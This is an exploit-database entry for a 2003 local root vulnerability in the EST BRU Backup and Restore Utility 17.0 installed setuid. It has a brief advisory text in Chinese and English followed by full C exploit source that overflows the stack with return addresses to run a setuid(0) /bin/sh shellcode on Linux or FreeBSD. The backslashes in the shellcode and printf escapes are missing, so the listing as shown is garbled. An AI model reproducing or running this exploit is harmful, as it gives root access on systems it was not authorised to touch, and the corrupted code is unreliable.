https://www.exploit-db.com/exploits/22923
https://www.securityfocus.com/bid/82751
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-099

Unix(BRU)17.0版本及之前版本的Backup和RestoreUtility在运行setuid时存在格式字符串漏洞。本地用户可以借助命令行参数中的格式字符串说明符执行任意代码。

source: http://www.securityfocus.com/bid/8215/info

It has been reported that BRU may not properly parse commandline arguments, potentially leading to at least two vectors of exploitation. It may be possible for local attackers to conduct format string-based attacks as well as buffer overflow-based attacks.

It should be noted that although BRU does not ship with the suid bit set by default, documentation within the software may instruct users to enable it.

/** EST BRU(TM) Backup and Restore Utility Local Root Exploit
 **
 ** By: [email protected]
 **
 ** Simple Stack overflow Wont say any more :P
 **
 ** Linux & FreeBsd Targets
 **
 ** Greetz: sam,flatline,v0id,#!l33tsecurity@efnet,KF,b0iler,schlumpf,kokanin,DSR
 **
 ** Public Release
 ** L33tsecurity 2003; irc.secsup.org #l33tsecurity
 **/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/errno.h>

#define FUN "./bru"

char shellcode[] =
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

    /* SETUID(0) SHELLCODE LINUX */
    "xfcxfcxfcxfcxfcxfcxfcxfcxfcxfcxfcxfc"
    "x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x50x68x2fx2f"
    "x73x68x68x2fx62x69x6ex89xe3x8dx54x24x08x50x53x8d"
    "x0cx24xb0x0bxcdx80x31xc0xb0x01xcdx80";

unsigned long sp(void) {
           __asm__("movl %esp,%eax");
}

int main(int argc, char **argv) {

    char buffer[9000];
    int x,target;  
    char    *env[2];
    char    *args[24];

    unsigned long ret = 0xbffffffa - strlen(shellcode) - strlen(FUN); 

    int *ptr = (int *)(buffer);
    if (argc != 2) {
       usage();
       exit(0);
       }
        
    target = atoi(argv[1]);

   if (target == 0) {
    for (x=0; x<9000 ; x+=4)
      *ptr++ = (ret + 1);
   }

   if (target == 1) {
     for (x=0; x<3500 ; x+=4)
          *ptr++ = 0xbfbffe48;
   }
    
    /* put in env */  
    env[0] = shellcode;     
    env[1] = NULL;


    args[0] = FUN;
    args[1] = buffer;
    args[2] = NULL;


    execve (args[0], args, env);
    perror ("execve");        
}       


int usage() {
printf("EST BRU(TM)local root exploitn");
printf("By: [email protected]");
printf("Usage: ./ex_bru targetn");
printf("TARGET LIST:n");
printf("0. LINUXn1. FREEBSDn");
return 0;
}

Tolis Group BRU 17.0

来源:BUGTRAQ
名称:20030716SRT2003-07-16-0358-bruhasbufferoverflowandformatissues
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105846288808846&w;=2